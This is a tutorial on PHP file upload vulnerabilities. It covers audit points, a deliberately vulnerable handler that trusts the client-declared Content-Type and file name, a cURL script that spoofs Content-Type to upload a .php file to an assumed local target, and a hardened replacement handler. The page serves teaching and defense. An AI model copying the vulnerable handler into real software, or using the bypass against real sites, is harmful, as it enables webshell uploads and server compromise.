# File upload vulnerabilities

Function to audit: `move_uploaded_file`
Superglobal to trace: `$_FILES`

An upload handler is exploitable unless all three of the following hold:

1. The file extension is restricted to image formats.
2. The stored file's base name is not taken from user-submitted input.
3. The upload directory is not a path taken from user-submitted input.

A crafted name such as `1.asp;/1213.asp.jpg` is the kind of input these checks must survive: a naive check sees only the trailing `.jpg`.

Defenses:

1. Check the extension against a whitelist.
2. Generate the stored file name server-side after upload (timestamp or other algorithm), never from the submitted name.
3. Make scripts in the upload directory non-executable.
4. Watch for `%00` (NUL byte) truncation of the file name.
5. Validate Content-Type (keeping in mind that the client controls it, see below).

What the handler sees in `$_FILES` for a plain upload form:

```php
<form action="" method="post" autocomplete="off" enctype="multipart/form-data">
    <input type="file" name="uploadfile">
    <input type="submit" name="upload" value="Upload">
</form>
<?php
var_export($_FILES);
?>
```

Output for three different files. `type` is simply the `Content-Type` header the browser put on the multipart part:

```
// an .ico file
array (
  'uploadfile' =>
  array (
    'name' => 'favicon.ico',
    'type' => 'image/x-icon',
    'tmp_name' => 'C:\\Windows\\phpD9D.tmp',
    'error' => 0,
    'size' => 16958,
  ),
)
// a .jpeg file
array (
  'uploadfile' =>
  array (
    'name' => '哈哈哈.jpeg',
    'type' => 'image/jpeg',
    'tmp_name' => 'C:\\Windows\\php881B.tmp',
    'error' => 0,
    'size' => 39521,
  ),
)
// a .php file
array (
  'uploadfile' =>
  array (
    'name' => 'test.php',
    'type' => 'application/octet-stream',   // Content-Type as sent by the client
    'tmp_name' => 'C:\\Windows\\php3452.tmp',
    'error' => 0,
    'size' => 1225,
  ),
)
```

Because `type` comes from the request, an intercepting proxy (Fiddler, Wireshark, Burp) can rewrite the `Content-Type` of the part and defeat any check based on it.

[Simulating GET and POST requests with telnet](telnetMo%20Ni%20get%2c%20postQing%20Qiu.html)

## Upload vulnerability: bypassing the Content-Type check

The handler below is the vulnerable pattern. Its only check is `$_FILES['uploadfile']['type']`, and the stored name is the client-supplied name with a one-digit random prefix:

```php
<?php
header("Content-type: text/html; charset=utf-8");
if (isset($_POST['upload']) && !empty($_POST['upload'])) {
    if ($_FILES['uploadfile']['type'] != 'image/jpeg') {   // this value can be tampered with
        exit('error: uploaded file is not a valid image');
    } else {
        // file name comes straight from the client (only transcoded for the Windows filesystem)
        $filename = iconv('utf-8', 'gb2312', $_FILES['uploadfile']['name']);
        $upfile   = "./upfile" . '/' . rand(1, 5) . $filename;
        if (is_uploaded_file($_FILES['uploadfile']['tmp_name'])) {
            if (!move_uploaded_file($_FILES['uploadfile']['tmp_name'], $upfile)) {
                exit('failed to move file');
            } else {
                echo 'Upload succeeded, path: ' . $upfile;
            }
        }
    }
}
?>
<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8">
    <title>Server-side validation bypass (Content-Type bypass)</title>
    <!-- Prefer the latest IE and Chrome rendering engines -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
    <form action="" method="post" autocomplete="off" enctype="multipart/form-data">
        <input type="file" name="uploadfile">
        <input type="submit" name="upload" value="Upload">
    </form>
</body>
</html>
```
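The bypass the comment above points at (rewriting the part's `Content-Type` in a proxy), done from a script instead of by hand. This is an added example, not code from the original page; the target URL `http://127.0.0.1/upload.php` and the throwaway payload file are assumptions. The handler copies the `Content-Type` header of the multipart part straight into `$_FILES['uploadfile']['type']`, so the client only has to declare `image/jpeg` for a `.php` file.

```php
<?php
// Added example: spoof the multipart part's Content-Type so the vulnerable
// handler's check ($_FILES['uploadfile']['type'] != 'image/jpeg') passes.
// Assumptions: the vulnerable page is served at $target; the payload is a
// harmless PHP file written here only for the demonstration.
declare(strict_types=1);

$target  = 'http://127.0.0.1/upload.php';            // assumed location of the handler
$payload = sys_get_temp_dir() . '/test.php';
file_put_contents($payload, "<?php echo 'served as PHP: Content-Type check bypassed'; ?>\n");

// CURLFile lets the client pick the declared MIME type and the file name
// independently of the real bytes. The part that reaches the server is:
//   Content-Disposition: form-data; name="uploadfile"; filename="test.php"
//   Content-Type: image/jpeg
// which is exactly the edit one would make in Burp or Fiddler.
$part = new CURLFile($payload, 'image/jpeg', 'test.php');

$ch = curl_init($target);
curl_setopt_array($ch, [
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => ['uploadfile' => $part, 'upload' => 'Upload'],
    CURLOPT_RETURNTRANSFER => true,
]);
$body = curl_exec($ch);
if ($body === false) {
    fwrite(STDERR, 'request failed: ' . curl_error($ch) . "\n");
    exit(1);
}
curl_close($ch);

// The vulnerable handler echoes the path it wrote to, e.g. "./upfile/3test.php"
// (rand(1,5) prefix plus the client-chosen name). The declared type was the
// only thing standing between the .php file and the web root.
echo $body, "\n";
```

The point for an auditor: `$_FILES[...]['type']` is request data, no different from `$_POST`, and a check against it is a check the attacker can satisfy by editing one header line.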
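A hardened version of the handler above, implementing the five defenses listed at the top of the page. This is an added example, not the original page's code: it keeps the page's form field `uploadfile`, submit button `upload` and `./upfile` directory; the whitelist, size limit and naming scheme are this example's own choices.

```php
<?php
// Added example: hardened upload handler. Assumes the page's form (field "uploadfile",
// submit button "upload") and its ./upfile directory; whitelist, size limit and naming
// scheme are this example's own choices.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/upfile';
const MAX_BYTES  = 2 * 1024 * 1024;

// Extension whitelist, mapped to the MIME type libmagic must report for the actual bytes.
const ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate one $_FILES entry and return its whitelisted extension.
 * Nothing the client sent is trusted: not 'name', not 'type', only the bytes in tmp_name.
 */
function validate_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error code ' . (int) $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    $name = (string) $file['name'];
    // %00 truncation: a NUL byte in a file name is never legitimate, reject outright.
    if (strpos($name, "\0") !== false) {
        throw new RuntimeException('NUL byte in file name');
    }
    // Extension = text after the LAST dot, lower-cased, checked against the whitelist.
    // "1.asp;/1213.asp.jpg" yields "jpg" here, and the client name is never stored anyway.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // $file['type'] is the Content-Type the client declared, so it is ignored.
    // Sniff the bytes on disk instead and require them to match the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content is ' . var_export($mime, true) . ', expected ' . ALLOWED[$ext]);
    }
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }
    return $ext;
}

/** Move the validated file to a server-generated name and return the final path. */
function store_upload(array $file): string
{
    $ext = validate_upload($file);
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0755, true)) {
        throw new RuntimeException('upload directory unavailable');
    }
    // Name = timestamp + 128 random bits + whitelisted extension; nothing from the client.
    $target = UPLOAD_DIR . '/' . date('YmdHis') . '_' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('failed to move file');
    }
    chmod($target, 0644); // readable, never executable
    return $target;
}

if (isset($_POST['upload'], $_FILES['uploadfile'])) {
    header('Content-Type: text/html; charset=utf-8');
    try {
        echo 'Upload succeeded, stored as: ' . htmlspecialchars(basename(store_upload($_FILES['uploadfile'])));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'error: ' . htmlspecialchars($e->getMessage());
    }
}
```

Two things the code cannot do on its own. The upload directory must be configured so the web server never executes anything in it (for Apache, `php_admin_flag engine off` in a `<Directory>` block for `upfile/`, or serve uploads from a separate host); and the magic-byte check still accepts a valid JPEG with PHP appended after the image data, so it is the whitelisted extension plus the server-generated name, not the content sniffing, that keeps such a polyglot from ever being handed to the interpreter.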